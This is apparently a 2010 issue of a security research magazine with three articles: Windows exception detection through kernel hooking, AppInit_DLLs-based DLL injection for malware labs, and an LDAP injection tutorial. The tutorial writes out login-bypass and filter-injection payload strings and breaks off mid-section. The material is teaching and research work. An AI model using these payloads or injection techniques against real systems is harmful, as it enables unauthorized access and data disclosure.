HITB Magazine

Editorial 

Dear Reader, 

Welcome to 2010 and to our newly 'reborn' HITB ezine! As
some of you may know, we previously published a monthly
ezine, but the birth of the HITBSecConf conference series
kept us too busy to continue working on it. Until now, that is...

As with our conference series, the main purpose of this new
format ezine is to give security researchers a technical
outlet for sharing their knowledge with the security
community. We want these researchers to gain further
recognition for their hard work, and we have no doubt the
security community will find the material beneficial.

We have decided to make the ezine available for free in the
continued spirit of HITB in "Keeping Knowledge Free". In
addition to the freely available PDF downloads, combined
editions of the magazine will be printed in limited quantities
for distribution at the various HITBSecConf events around the
world: Dubai, Amsterdam and Malaysia. We aim to print only
between 100 and 200 copies (maybe fewer) per conference, so be
sure to grab a copy when they come out!

As always we are constantly looking for new material as well 
as suggestions and ideas on how to improve the ezine, so if 
you would like to contribute or if you have a suggestion to 
send over, we're all ears :) 
Happy New Year once again and we hope you enjoy the zine! 



Zarul Shahrin 
Editor-in-Chief, 
zarulshahrin@hackinthebox.org 
Exception Detection on Windows

By Gynvael Coldwind, HISPASEC 



Vulnerability researchers use various techniques
for finding vulnerabilities, including source code
analysis, machine code reverse engineering and
analysis, input data protocol or format analysis, input
data fuzzing, etc. When the researcher passes input
data to the analyzed product, the execution flow must
be observed in search of potential anomalies. In
some cases, such anomalies lead to a fault, which
in turn throws an exception. This makes exceptions
the most observable symptom of unexpected program
behavior caused by malformed input, especially if
the exception is not handled by the application and a
JIT debugger or Dr. Watson [1] is launched.

Acknowledging this behavior, the researcher might 
want to monitor exceptions in a given application. 
This is easy if the exceptions are not handled, but it 
gets more complicated if the application handles the 
exception quietly, especially if anti-debugging meth- 
ods are involved. 

This article covers several possible ways of detect- 
ing exceptions, and briefly describes an open source 
kernel-level exception detection tool called ExcpHook. 

Exception detection methods 

Several exception detection methods are available on
Windows, including the user-mode debugger API, as well
as more invasive methods such as registering an
exception handler in the context of the monitored
process, hooking the user-mode exception dispatcher, or
using kernel-mode methods such as interrupt service
routine hooks or kernel-mode exception dispatcher hooks.
Each method has its pros and cons, and each is
implemented in a different way. The rest of this article
describes the selected methods.

Debugger API 

The most straightforward method of exception detection
relies on the Windows debugger API and its architecture,
which ensures that a debugger attached to a process
receives information about every exception thrown in
its context (once, or twice if the application does not
handle the exception after having a chance to do so).

A big advantage of this method is that it uses the
official API, which makes it compatible with most, if
not all, Windows versions. Additionally, the API is well
documented and rather trivial to use: a simple exception
monitor requires only a small debugger loop that
handles a few debug events.

However, some closed-source, mostly proprietary,
software contains anti-reverse-engineering tricks [2],
which quite often include refusing to run when an
attached debugger is detected. This makes the approach
lose its simplicity, since anti-debugger-detection
methods must then be implemented.

Additionally, a debugger is attached either to a running
process or to a process that it spawns. For ease of use,
the monitor should probably watch every spawned process
of a given class (that is, from a given executable file),
which requires additional methods for monitoring
process creation [3] and decreases the simplicity by yet
another degree.

Remote exception handler 

A more invasive method, which still uses only the
documented API, is to create an exception handler in
the context of the monitored process. The easiest way
to achieve this is to load a DLL into the context of the
monitored process (a common way of doing this is
calling OpenProcess and CreateRemoteThread with
LoadLibrary as the thread procedure and the DLL name,
placed in the remote process memory, as the thread
procedure parameter), and then to set up the different
kinds of exception handlers.

On Microsoft Windows, there are two different
exception handling mechanisms: Structured Exception
Handling [4][5] with the Unhandled Exception Filter [6],
and Vectored Exception Handling [7] (introduced in
Windows XP).

Structured Exception Handling, commonly abbreviated
to SEH, is used mostly as a stack-frame member
(which, by the way, makes it a great target when
exploiting buffer overflows [8]) and, if used, changes
frequently (since every function sets its own exception
handler). At the architectural level, SEH is a singly
linked list of exception handlers. If none of the
handlers in the list manages to handle the exception,
an unhandled exception filter routine (which may be
set using the SetUnhandledExceptionFilter function)
is called. To allow stack-frame integration, SEH was
designed to be per-thread.

The other mechanism is Vectored Exception Han- 
dling, which is a global (affects all threads present 
in the process) array of exception handlers, always 
called prior to the SEH handlers. When adding a VEH 
handler, the caller can decide whether to add it at the 
beginning or the end of the vector. 

This method has two drawbacks. First, creating a new
thread and loading a new module in the context of
another application is a very noisy event, which is
easily detected by anti-debugging methods, if any are
employed. Second, keeping the exception handlers both
registered and first in line might be very hard,
especially since SEH handlers are registered per-thread
and tend to change quite often, and any VEH handler
that gets registered could jump in front of the
handler registered by the monitor. Additionally,
this may change the flow of the process execution,
making the measurements inaccurate.

To summarize, this method is neither easy to code, 
nor quiet. 

KiUserExceptionDispatcher 

The previous method sounded quite promising, 
but the high-level exception API was not good for 
monitoring purposes. Let's take a look at a lower, but 
still user mode, level of the exception mechanisms on 
Microsoft Windows. 

The first function executed in user mode after an
exception takes place is KiUserExceptionDispatcher [9]
from the NTDLL.DLL module (it is one of very few [10]
user-mode functions called directly from kernel
mode). The name describes this function well: it is a
user-land exception dispatcher, responsible for invoking
both the VEH and SEH exception handlers, as well
as the SEH unhandled exception filter function.

Inline-hooking this function would allow the monitor
to learn about an exception before it is handled. This
could be done by loading a DLL into the desired process,
overwriting the first few bytes of the routine with an
arbitrary jump, and eventually returning to the original
KiUserExceptionDispatcher (leaving the environment
unchanged, of course).

This method is quite easy to implement, and quite
powerful at the same time. However, it is still easy
to detect, since inline-hooking leaves a very visible
mark. Also, as stated before, creating a remote thread
and loading a DLL is a noisy task, which could alert
anti-debugging mechanisms.

Additionally, just like both previous methods, this
still has to be done per-process, which is inconvenient
if one wants to monitor a whole class of processes.
Still, compared to the previous method, it is a step
forward.

Interrupt handler hooking 

Another approach to exception monitoring is to 
monitor CPU interrupts in kernel mode. 

As one may know, after an exception condition
is met, an interrupt is generated, which causes a
handler registered in the Interrupt Descriptor Table
(IDT) to be called. The IDT entry can be an interrupt
gate, a trap gate or a task gate [11], but in the case of
Windows exceptions it is typically an interrupt gate
pointing to a specific Interrupt Service Routine (ISR)
that routes the execution to the exception dispatcher.

An exception monitor could hook the exceptions'
ISRs by overwriting entries in the IDT [12]. This approach
lets the monitor remain undetected by the standard
methods used for debugger detection in user land,
and at the same time it is system-wide, making it
possible to monitor all processes of a given class
(and kernel-mode exceptions too, if desired). Additionally,
the author can decide which exceptions are worth
monitoring and which are not.

However, at ISR level, the function does not have 
any easily accessible information about the processes 
that generated the exception, nor does it have pre- 
pared data about the exception. Additionally, patch- 
ing the IDT would alert PatchGuard, leading to a Blue 
Screen of Death in newer Windows versions. 

KiDispatchException 

Following the execution flow of the ISR, one will finally
reach the KiDispatchException routine [13]. This function
can be thought of as a kernel-mode equivalent
of KiUserExceptionDispatcher: it decides what to do
with an exception, and who should be notified of it.
This means that every generated exception passes
through this function, which is very convenient for
monitoring purposes. Additionally, KiDispatchException
receives all the interesting details about the
exception and the context of the application in the
form of two structures passed as function arguments:
EXCEPTION_RECORD [14] and KTRAP_FRAME [15]. A further
parameter of this function is the FirstChance flag
(KiDispatchException is called twice, the same
way a debugger is notified: once before exception
handling, and once more if the exception was not handled).

Inline-hooking this function allows both monitoring 
the exceptions in a system-wide manner and easily 
accessing all the important data about the exception 
and the faulty process. 

This method has two drawbacks. First, the
KiDispatchException function is not exported, so
there is no documented way of acquiring its address.
The second problem is similar to the IDT hooking
case: PatchGuard on newer systems will be triggered
if this function is inline-hooked.

ExcpHook 

An open source exception monitor for Windows XP, 
ExcpHook (available at http://gynvael.coldwind.pl/ 
in the "Tools" section), can be used as an example 
of a KiDispatchException inline-hooking exception 
monitor. 

At the architectural level, the monitor is divided into
two parts: the user-land part and the kernel-mode
driver. Executing the user-land executable registers
and loads the driver. The driver creates a device
called \\.\ExcpHook, which is used for communication
between the user-mode application and the driver.
When the user-land application connects to the driver,
KiDispatchException is rerouted to
MyKiDispatchException, a function that saves the
incoming exceptions to a buffer, which is later
transferred to user mode. Apart from the exception
information and CPU register contents, the buffer also
stores 64 bytes of stack and 256 bytes of code (these
sizes are defined by the ESP_BUFFER_SIZE and
EIP_BUFFER_SIZE constants), the image name taken
from EPROCESS, and the process ID.

In order to find the KiDispatchException function,
ExcpHook (in the current version) uses simple signature
scanning of the kernel image memory. The address
could also be acquired from the PDB symbol files
available on the Microsoft web site, or by tracing the
code of one of the callers of KiDispatchException
(e.g. the ISRs).
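Signature scanning of this kind can be sketched in a few lines of Python. This is only an illustration of the idea, not ExcpHook's code: the byte pattern, the sample buffer and the name find_signature are hypothetical, and a real scanner would walk the kernel image rather than a Python bytes object.

```python
from typing import Optional, Sequence


def find_signature(image: bytes, pattern: Sequence[Optional[int]]) -> int:
    """Return the offset of the first match of pattern in image, or -1.

    A pattern element of None is a wildcard that matches any byte.
    """
    n, m = len(image), len(pattern)
    for start in range(n - m + 1):
        if all(p is None or image[start + i] == p
               for i, p in enumerate(pattern)):
            return start
    return -1


# Hypothetical signature: push ebp; mov ebp, esp; sub esp, <any>; push ebx
SIGNATURE = [0x55, 0x8B, 0xEC, 0x83, 0xEC, None, 0x53]

# Made-up "image": 16 bytes of padding followed by a matching prologue.
image = bytes([0x90] * 16 + [0x55, 0x8B, 0xEC, 0x83, 0xEC, 0x40, 0x53, 0xC3])

offset = find_signature(image, SIGNATURE)
print(hex(offset))  # 0x10
```

The wildcard entry is what makes a signature survive small differences between builds, such as a different stack frame size; the price is a higher chance of false matches, so a practical signature should be long enough to be unique within the image.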

The user-land code is responsible for filtering this
information (i.e. checking whether the exception is
related to a monitored class of processes), acquiring
more information about the process (e.g. the exact
image path) and displaying this information to the user.
The code is disassembled using the diStorm64 [16]
library.



Exception detected
PID: 2092  First Chance: YES
Exception code: 10000004 (KI_EXCEPTION_ACCESS_VIOLATION)
Exception addr: 0040130a
Image (from OpenProcess): e:\hitb\excp_accviol-c.exe
Image (from EPROCESS)   : excp_accviol.c -
Param count: 2
Params:
  00000000 88776655
Access Violation Type  : READ
Accessed Memory Address: 88776655

Eax: 00401360 Edx: 77c51ae8 Ecx: 00401360 Ebx: 00004000
Esi: 7c90e1fe Edi: 0006a19c Esp: 0022ff60 Ebp: 0022ff78
Eip: 0040130a
EFlags: 00010247
  CF: 1 PF: 1 AF: 0 ZF: 1 SF: 0 TF: 0
  IF: 1 DF: 0 OF: 0 NT: 0 RF: 1 VM: 0
  AC: 0 ID: 0
  IOPL: 0 VIF: 0 VIP: 0

Stack:
  77c2aead 0006a19c 003e2b10 00401305 00000010 00000002 0022ffb0 00401237
  00000001 003e2470 003e2b10 00404000 0022ffa4 ffffffff 0022ffa8 00000000

Code:
  [0040130a] a1 55667788  MOV EAX, [0x88776655]
  [0040130f] 8945 fc      MOV [EBP-0x4], EAX
  [00401312] b8 00000000  MOV EAX, 0x0
  [00401317] c9           LEAVE
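The EFlags value in the listing can be cross-checked against the individual flag lines. The following is a minimal Python sketch, assuming the standard x86 EFLAGS bit layout; the name decode_eflags is made up for illustration and is not part of ExcpHook.

```python
# Bit positions of the single-bit x86 EFLAGS fields shown in the listing.
EFLAGS_BITS = {
    "CF": 0, "PF": 2, "AF": 4, "ZF": 6, "SF": 7, "TF": 8,
    "IF": 9, "DF": 10, "OF": 11, "NT": 14, "RF": 16, "VM": 17,
    "AC": 18, "VIF": 19, "VIP": 20, "ID": 21,
}


def decode_eflags(value: int) -> dict:
    """Split a raw EFLAGS value into named fields."""
    flags = {name: (value >> bit) & 1 for name, bit in EFLAGS_BITS.items()}
    flags["IOPL"] = (value >> 12) & 3  # two-bit I/O privilege level
    return flags


flags = decode_eflags(0x00010247)
print([name for name, bit in flags.items() if bit])
# ['CF', 'PF', 'ZF', 'IF', 'RF']
```

Only CF, PF, ZF, IF and RF are set, which agrees with the flag lines printed by the tool.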
When executed without parameters, ExcpHook
displays information about all user-land exceptions
thrown. If a substring of the process name is given,
it displays information only about exceptions
generated by processes that contain the given
substring in their image name.

Since ExcpHook is open source (BSD-style license), it 
can be integrated into any fuzzing engine a researcher 
desires. 



Summary 

The Microsoft Windows exception flow architecture allows
an exception monitor to use quite a few different
approaches and methods. Both user-mode and kernel-mode
methods are interesting, and all of them have different
pros and cons. No single method can be considered
best, but the three most useful methods are
KiDispatchException hooking, KiUserExceptionDispatcher
hooking, and using the debugger API. Happy
vulnerability hunting!
The Art of DLL Injection

By Christian Wojner, IT-Security Analyst at CERT.at 



Microsoft Windows sometimes really makes
people wonder why specific functionalities,
especially those making the system more
vulnerable than it has to be, made (and still make) it
onto the shelves.

One of these for sure is the native ability to inject
DLLs into processes by default. What I'm talking about
is the registry key "AppInit_DLLs". Although I'm
aware that this is nothing new for the pros
out there, I guess most of you haven't tried it or even
thought about using it productively in a malware
analysis lab. The reasons for that range from concerns
about collateral damage, like performance and stability
issues, to some kind of aversion to its rather
primitive and therefore "less geeky" way of
doing hacks like DLL injection. However, playing around
with it in theory and practice definitely has its wow
factors.

About 

So let's take a closer look at the magic wand I am
talking about. It's all about the registry key
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Windows\AppInit_DLLs"
(which we will refer to as APPINIT in this article). It was
first introduced in Windows NT and makes it possible to
declare one or more DLLs (separated by blanks or commas)
that should be loaded into (nearly) all processes at their
creation time. This is done by calling LoadLibrary()
during the DLL_PROCESS_ATTACH call of "User32.dll"'s
DllMain. Unfortunately not *every* process imports
functionality of "User32.dll", but *most* of them do,
so you have to keep in mind that there's always a chance
for it to miss something.

Benefits 

However, the first benefit you gain from
APPINIT is based on its fundamental concept. By
writing log entries during the attach and detach
calls of your APPINIT-DLL (DLL_PROCESS_ATTACH,
DLL_PROCESS_DETACH, DLL_THREAD_ATTACH and
DLL_THREAD_DETACH) you will get a decent overview
of and feeling for the things going on under the
hood of Windows, especially at boot time (depending
on the first load of "User32.dll"). I'd also recommend
gathering the command line of each process your
DLL is attached to (DLL_PROCESS_ATTACH)
with GetCommandLine(), as it will reveal some more
secrets. In my malware analysis lab I currently log the
following information per log entry, which has
fulfilled my needs so far:

* Timestamp
* Instance (hinstDLL of DllMain)
* Call type (fdwReason of DllMain)
* Current process ID (GetCurrentProcessId())
* Current thread ID (GetCurrentThreadId())
* Module filename (GetModuleFileName(...))
* Command line (in case of DLL_PROCESS_ATTACH)

Having satisfied the need for clarity about
system activities this way, there are a lot more
use cases for APPINIT. Let's focus on malware behavioural
analysis now. It is sometimes hard to trace
malware that injects itself "somewhere" in the system,
but our APPINIT logging (as described above) will already
do the job for us. It shows every process our
APPINIT-DLL gets attached to and detached from, and the
same applies to the life cycle of these processes' threads,
which leaves a very transparent trail of footprints
of the executed malware (or process).

Depending on the things you'd like to do or analyze,
it might also be of interest to know *when* your
APPINIT-DLL is loaded into a newly
created process. As already mentioned, it is "User32.dll"
that is responsible for loading your APPINIT-DLL.
This means that your APPINIT-DLL, and therefore any
code you like, will be loaded *before* (disregarding
TLS callbacks and similar techniques) the malware
functionality. In addition, I have to point
out that at this point your code is already running in
the memory space of the malware (or executable)
you'd like to analyze. So monitoring and any type of
shoulder-surfing based on the memory (activity) of
the process in question should be quite easy
and stable. The only thing to take care of is to restrict
these obviously performance-related activities to the
specific process.

Taking this into account, it might be useful to
give your APPINIT-DLL the ability to
act as a kind of needle threader and run some special
code under special circumstances (e.g. depending on
the module's filename). I have put this ability in my
lab's APPINIT-DLL but tried to keep it generic for the
future by loading another special DLL under those
special circumstances. Furthermore, my implementation
offers the option to first have some code running
serialized at the DLL's INIT, and second to have some
code running in parallel (through threads) after that
to keep the execution of my code persistent.

Detection 

As always, there is an arms race between white hats
and black hats, and I have to admit that for this topic
it's just the same. Of course it is possible to detect a
foreign DLL being around or to read out the relevant
registry key. So there could already be malware
that detects this approach. But I won't speculate:
at least I haven't yet analyzed any malware that
reacted to these circumstances.

Installation/Deinstallation 

Let's see what it takes to get an APPINIT-DLL installed.
You only have to set the value of the registry key
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Windows\AppInit_DLLs"
to your APPINIT-DLL's
fully qualified path (or add it, separated with blanks
or commas, if there already is one). You can do this in
any way you like as long as you have the permissions
to do so, but as we're talking about malware analysis
labs I assume that you have them.
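Adding a DLL to an existing value without clobbering other entries can be sketched as follows. This is a minimal Python illustration of the "blanks or commas" rule only; the helper names and the example paths are hypothetical, and the sketch assumes that the paths themselves contain no blanks, since a blank would be read as a separator.

```python
import re


def split_appinit(value: str) -> list:
    """Split an AppInit_DLLs string on blanks or commas, dropping empty parts."""
    return [part for part in re.split(r"[ ,]+", value) if part]


def add_appinit_dll(value: str, dll_path: str) -> str:
    """Return the value with dll_path appended, unless it is already listed."""
    entries = split_appinit(value)
    if dll_path.lower() not in (entry.lower() for entry in entries):
        entries.append(dll_path)
    return " ".join(entries)


def remove_appinit_dll(value: str, dll_path: str) -> str:
    """Return the value with every occurrence of dll_path removed."""
    return " ".join(entry for entry in split_appinit(value)
                    if entry.lower() != dll_path.lower())


current = r"C:\tools\a.dll,C:\tools\b.dll"   # hypothetical existing value
updated = add_appinit_dll(current, r"C:\lab\appinit.dll")
print(updated)
print(remove_appinit_dll(updated, r"C:\lab\appinit.dll"))
```

The functions only compute the new string; on a Windows lab machine the value itself could then be read and written with any registry tool or API, for example Python's winreg module.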

NOTE: According to Microsoft, since Windows Vista
you also have to set the key "LoadAppInit_DLLs" (under
the same location) to 1 to enable the APPINIT feature.
Since Windows 7 there's another lever that has to be
pulled to achieve the known functionality: you have to
set the key "RequireSignedAppInit_DLLs" to 0, otherwise
you'd be restricted to using signed DLLs only.

After that you just have to reboot your machine and 
your APPINIT-DLL should be up and running. 

To get rid of your "enhancement" again you just 
have to remove it from the well known registry key 
and another reboot will do the commit. 

Drawbacks? 

None at all. As long as you do not allocate unneces- 
sary memory or have some endless or long running 
loops in the serial INIT calls there shouldn't be any 
recognizable impact. 

Epilogue 

Now that you have seen how mighty this little registry
key can be, I guess you already have your own ideas.
And if not, at least keep it in mind in case you see
it being written by some application: that application
might not be what it's supposed to be.

For those of you who don't like to code, feel free to
download and use my implementation of an APPINIT-DLL
at your own risk:

http://www.array51.com/static/downloads/appinit.zip
(The log file is written to the user's temp directory and is named appinit.txt)
LDAP Injection Attack and Defence Techniques

LDAP (Lightweight Directory Access Protocol) is an application protocol for managing directory services.
This protocol is used in many applications, so it is important to understand the security issues around it. The
objective of this article is not to provide an extensive explanation of the protocol itself but to show different
attacks related to LDAP Injection and possible prevention techniques.



By Esteban Guillardoy (eguillardoy@ribadeohacklab.com.ar), Facundo de Guzman (fdeguzman@ribadeohacklab.com.ar), 
Hernan Abbamonte (habbamonte@ribadeohacklab.com.ar) 



A directory service is simply the software system
that stores, organizes and provides access to
information in a directory. Based on the X.500
specification, the Directory is a collection of open systems
cooperating to provide directory services. A directory
user accesses the Directory through a client (or
Directory User Agent (DUA)). The client, on behalf of the
directory user, interacts with one or more servers (or
Directory System Agents (DSA)). Clients interact with
servers using a directory access protocol [1].

LDAP provides access to distributed directory 
services that act in accordance with X.500 data and 
service models. These protocol elements are based 
on those described in the X.500 Directory Access 
Protocol (DAP). Nowadays, many applications use 
LDAP queries with different purposes. Usually, direc- 
tory services store information like users, applica- 
tions, files, printers and other resources accessible 
from the network. Furthermore, this technology is 
also expanding to single sign on and identity man- 
agement applications. As LDAP defines a standard 
method for accessing and updating information in 
a directory, a person trying to gain access to sensi- 
tive information stored on a directory will try to use 
an input-validation based attack known as LDAP 
Injection. This technique is based on entering a mal- 
formed input on a form that is used for building the 
LDAP query in order to change the semantic mean- 
ing of the query executed on the server. By doing 
this, it is possible for example, to bypass a login form 
or retrieve sensitive information from a directory 
with restricted access. 

Some of the most well known LDAP implementations
include OpenLDAP [2], Microsoft Active Directory [3],
Novell eDirectory and IBM Tivoli Directory Server.
Each of them may handle some LDAP search requests
in a different way. Regarding security, besides the
LDAP server configuration, the applications that make
use of the LDAP server are of capital importance.
These applications often receive some kind of user
input that may be used to perform a request. If this user
input is not handled correctly, it could lead to security
issues resulting in information disclosure, information
alteration, etc. Commonly, LDAP injection attacks are
performed against web apps, but of course you may
also find desktop applications making use of
the LDAP protocol.

LDAP Query - String Search Criteria 
LDAP Injection attacks are based on generating a user 
input that modifies the filtering criteria of the LDAP 
query. It is important to understand how these filters 
are formed. 

RFC 4515 specifies the string representation of
search filters that are syntactically correct in LDAP
queries [4]. The Lightweight Directory Access Protocol
(LDAP) defines a network representation of a search
filter transmitted to an LDAP server. Some applications
may find it useful to have a common way of
representing these search filters in a human-readable
form; LDAP URLs are an example of such an application.

Search filters have the following form: 

Attribute Operator Value 

The string representation of an LDAP search filter is
defined by the following grammar, using the ABNF
notation.
filter     = "(" filtercomp ")"
filtercomp = and / or / not / item
and        = "&" filterlist
or         = "|" filterlist
not        = "!" filter
filterlist = 1*filter
item       = simple / present / substring / extensible
simple     = attr filtertype value
filtertype = equal / approx / greater / less
equal      = "="
approx     = "~="
greater    = ">="
less       = "<="
present    = attr "=*"
substring  = attr "=" [initial] any [final]
initial    = value
any        = "*" *(value "*")
final      = value



As seen in the grammar, simple conditions can
be combined using the AND (&), OR (|) and NOT (!)
operators, and each combined filter must be enclosed
in parentheses.

The special character "*" matches zero or more
characters in a filter string.

A few examples of this notation:

(cn=Babs Jensen)
(!(cn=Tim Howes))
(&(objectClass=Person)(|(sn=Jensen)(cn=Babs J*)))
(o=univ*of*mich*)
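To make the notation more concrete, the following Python sketch parses such filter strings and evaluates them against a single in-memory entry. It is a simplified illustration under several assumptions, not a complete implementation: it covers only the and, or, not, equality, presence and substring forms, ignores escape sequences, compares values case-insensitively, and accepts an empty filter list such as (&). All names and the sample entry are made up.

```python
import re


def parse_filter(text: str, pos: int = 0):
    """Parse one filter starting at text[pos]; return (tree, next_pos)."""
    if pos >= len(text) or text[pos] != "(":
        raise ValueError(f"expected '(' at position {pos}")
    pos += 1
    if pos >= len(text):
        raise ValueError("unexpected end of filter")
    op = text[pos]
    if op in "&|":                      # and / or: a list of sub-filters
        pos += 1
        children = []
        while pos < len(text) and text[pos] == "(":
            child, pos = parse_filter(text, pos)
            children.append(child)
        node = (op, children)
    elif op == "!":                     # not: exactly one sub-filter
        child, pos = parse_filter(text, pos + 1)
        node = ("!", child)
    else:                               # item: attr "=" value
        end = text.index(")", pos)      # ValueError if ')' is missing
        attr, sep, value = text[pos:end].partition("=")
        if not attr or not sep:
            raise ValueError(f"malformed item at position {pos}")
        node = ("item", attr, value)
        pos = end
    if pos >= len(text) or text[pos] != ")":
        raise ValueError(f"expected ')' at position {pos}")
    return node, pos + 1


def parse(text: str):
    """Parse a string that must contain exactly one filter."""
    tree, end = parse_filter(text)
    if end != len(text):
        raise ValueError("trailing characters after filter")
    return tree


def matches(node, entry: dict) -> bool:
    """Evaluate a parsed filter against an entry {attr_lowercase: [values]}."""
    kind = node[0]
    if kind == "&":
        return all(matches(child, entry) for child in node[1])
    if kind == "|":
        return any(matches(child, entry) for child in node[1])
    if kind == "!":
        return not matches(node[1], entry)
    _, attr, pattern = node
    # '*' stands for zero or more characters; everything else is literal.
    regex = ".*".join(re.escape(part) for part in pattern.split("*"))
    values = entry.get(attr.lower(), [])
    return any(re.fullmatch(regex, v, re.IGNORECASE | re.DOTALL) for v in values)


entry = {"objectclass": ["Person"], "cn": ["Babs Jensen"],
         "sn": ["Jensen"], "o": ["University of Michigan"]}
for f in ["(cn=Babs Jensen)", "(!(cn=Tim Howes))",
          "(&(objectClass=Person)(|(sn=Jensen)(cn=Babs J*)))",
          "(o=univ*of*mich*)"]:
    print(f, matches(parse(f), entry))
```

All four example filters evaluate to True for this entry. Note that parse rejects any input with text after the first complete filter; a real LDAP server may behave differently in that situation.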

LDAP Injection 

LDAP Injection is just another kind of injection
attack. Basically, the idea behind this technique is to
take advantage of an application that does not handle
input values correctly. This can be achieved by sending
carefully crafted data that generates an LDAP
query of our choice. When the application uses
user-supplied values to build an LDAP query without
prior validation or sanitizing, the attacker may force
the execution of a statement by altering the construction
of the LDAP query. Notice that once the attacker
alters the statement by adding arbitrary code, the
process will run with the same privileges as a valid
query. This is a major security risk that must be
eliminated [5][6][7].



LDAP injection attacks are commonly used against 
web applications. They could also be applied to any 
application that has some kind of input used to per- 
form LDAP queries. 

Depending on the target application implementa- 
tion one could try to achieve: 

• Login bypass 

• Information disclosure 

• Privilege escalation

• Information alteration 

All these items are discussed in detail throughout
the article. Note that some of these attacks may
behave differently depending on the LDAP
server implementation, because each implementation
interprets search filters differently.

Login Bypass 

An LDAP repository is normally used to validate
credentials. Basically, two simple ways of implementing
authentication using LDAP can be distinguished:

• using the "bind" function or method to connect to
the LDAP server.

• using an LDAP search query against the LDAP
repository, checking the username and password fields.

Bind Method 

This authentication method cannot be bypassed easily
but, depending on the application logic, one could
end up with an anonymous bind.

This is sample code you could find in a web
application using a bind method [8]:



<?php
// Credentials are taken directly from the request.
$ldapuser = $_GET['username'];
$ldappass = $_GET['password'];

$ldapconn = ldap_connect("ldap.server.com")
    or die("Could not connect to server");

if ($ldapconn) {
    // First try an authenticated bind with the supplied credentials.
    $ldapbind = ldap_bind($ldapconn, $ldapuser, $ldappass);
    if (!$ldapbind) {
        // On failure the code falls back to an anonymous bind.
        $ldapbind = ldap_bind($ldapconn);
    }
}
?>
This code tries to perform a bind using the
username and password provided. If that is not successful,
it falls back to an anonymous bind.

This could be useful because, if the LDAP server security
is not correctly configured, an anonymous connection
could be enough to obtain information with the other
LDAP injection techniques discussed later in this
section.

Search Query 

This kind of authentication is similar to the one a
programmer would use with a standard database
storing username and password information. The
application runs a query to determine whether the
username and password hash are correct.

An LDAP search query to accomplish this could be 
something like this: 

(&(Username=user)(Password=passwd))

If the username and password values are not 
checked before using them in a search like the one 
above, we could insert particular values to alter the 
final query. 

For example, we could enter this text in the
username field: "user)(&))(" and anything in the password
field, in case the application rejects an empty field. This
will produce the following query:

(&(Username=user)(&))()(Password=zz))

Note that the first complete filter, (&(Username=user)(&)),
is true for this user even with an invalid password,
because the empty AND filter (&) always evaluates to true.
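The effect of the injected username can be reproduced with plain string handling. The Python sketch below assumes the application builds its filter by simple concatenation into the template shown above. As one possible form of sanitizing, it also escapes the characters that RFC 4515 reserves inside filter values. The function names are hypothetical.

```python
# Characters that RFC 4515 requires to be escaped inside a filter value.
_ESCAPES = {"\\": r"\5c", "*": r"\2a", "(": r"\28", ")": r"\29", "\x00": r"\00"}


def escape_filter_value(value: str) -> str:
    """Replace each reserved character with its backslash-hex escape."""
    return "".join(_ESCAPES.get(ch, ch) for ch in value)


def build_login_filter_unsafe(username: str, password: str) -> str:
    # Vulnerable: user input is concatenated into the filter unchanged.
    return f"(&(Username={username})(Password={password}))"


def build_login_filter_escaped(username: str, password: str) -> str:
    # Same template, but both values are escaped first.
    return (f"(&(Username={escape_filter_value(username)})"
            f"(Password={escape_filter_value(password)}))")


payload = "user)(&))("
print(build_login_filter_unsafe(payload, "zz"))
# (&(Username=user)(&))()(Password=zz))
print(build_login_filter_escaped(payload, "zz"))
# (&(Username=user\29\28&\29\29\28)(Password=zz))
```

In the unescaped result the string starts with the complete filter (&(Username=user)(&)), so the password condition is no longer part of it. In the escaped result the parentheses are just data inside the Username value, and the filter keeps its original two-condition structure.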

We could try different variations of the example
used here, because the search query could be written
using single or double quotes. Consequently, one
could try these inputs:

')(Username='validUsername')(&))(
\')(Username=\'validUsername\')(&))(
")(Username="validUsername")(&))(
\")(Username=\"validUsername\")(&))(

In this case, the attribute named Username is 
guessed since it is a very common attribute name. 

Information Disclosure 

It is important for an attacker to get familiar with the
existing structure of a company. Every bit of information
available can aid strangers on their quest to
attack a potential target. If the developer of a web
application is not careful enough, simple applications
can be twisted to obtain critical data.

Depending on the internal LDAP query an application
uses, an attacker could alter it, resulting in
another LDAP query that returns more information.

Supposing an application is using a filter with an OR 
condition like: 

( | (obj ectClass=device) 
(name=parameterl ) ) 

If the parameter supplied was as following: 

"test) (objectClass=*" 

the resulting query would be: 

( | (obj ectClass=device) (name=test ) 
(ob j ectClass=* ) ) 

This is a totally valid query but it is showing all ob- 
ject classes and not just the devices. 

The same can be achieved if the application uses an 
AND condition instead of OR. 

The filters above have a valid syntax, but if the
application does not check the final filter, the attacker
could try to create more than one filter in a single
string. If this is sent to the LDAP server, depending on
the implementation the server could parse the string
and take only the first complete and valid filter, ignoring
the rest.

For example, if the application internally uses a filter
like:

(&(attr1=userValue)(objectClass=device))

and the userValue is set to

test)(objectClass=*))(&(1=1

it will generate a final filter like:

(&(attr1=test)(objectClass=*))(&(1=1)(objectClass=device))

This string contains two filters, each of which is valid on
its own. The LDAP server would then interpret the first
filter (the one with the injected objectClass condition)
and ignore the second one.

When performing this kind of attack, you can
always try some common LDAP attribute names
such as objectClass, objectCategory, etc.
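
To see which part of an injected string a lenient server would keep, the first balanced filter can be extracted by counting parentheses. The sketch below is not how any particular LDAP server parses filters; the function name first_complete_filter is hypothetical and escaped parentheses inside values are not handled.

```python
def first_complete_filter(text: str) -> str:
    """Return the first balanced parenthesised group found in text."""
    depth = 0
    start = None
    for i, ch in enumerate(text):
        if ch == "(":
            if depth == 0:
                start = i          # remember where the group opens
            depth += 1
        elif ch == ")" and depth > 0:
            depth -= 1
            if depth == 0:
                return text[start : i + 1]
    raise ValueError("no complete filter found")


if __name__ == "__main__":
    template = "(&(attr1={})(objectClass=device))"
    injected = template.format("test)(objectClass=*))(&(1=1")
    print(injected)
    print(first_complete_filter(injected))
```

Running it on the injected string shows that the original objectClass=device restriction ends up in the second, ignored filter.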

Charset Reduction 

The objective of this technique is to enable the attack- 
er to determine valid characters that form the value 
of a given object property. The purpose is to take 
advantage of the LDAP query wildcards to construct 
queries with them and random characters. Each time 
a query guess is run, if the query is successful (mean- 
ing that some information is retrieved) a part of the 
property value will be revealed to the attacker. After 
a finite number of successful guesses, an attacker will 
be in a position to guess the complete value (or at 
least to iterate between the character matches to find 
the correct order). 

Suppose the target is 'http://ribadeohacklab.com.ar/people_search.aspx'.
By looking at the search page it was possible to determine
that the LDAP objects being queried have 'last_name',
'name', 'address' and 'telephone' properties, plus a hidden
'zone' property (which was disclosed using one of the above
techniques). By default the application is meant to give
person details only from the 'public' zone. How could this
limit be bypassed?
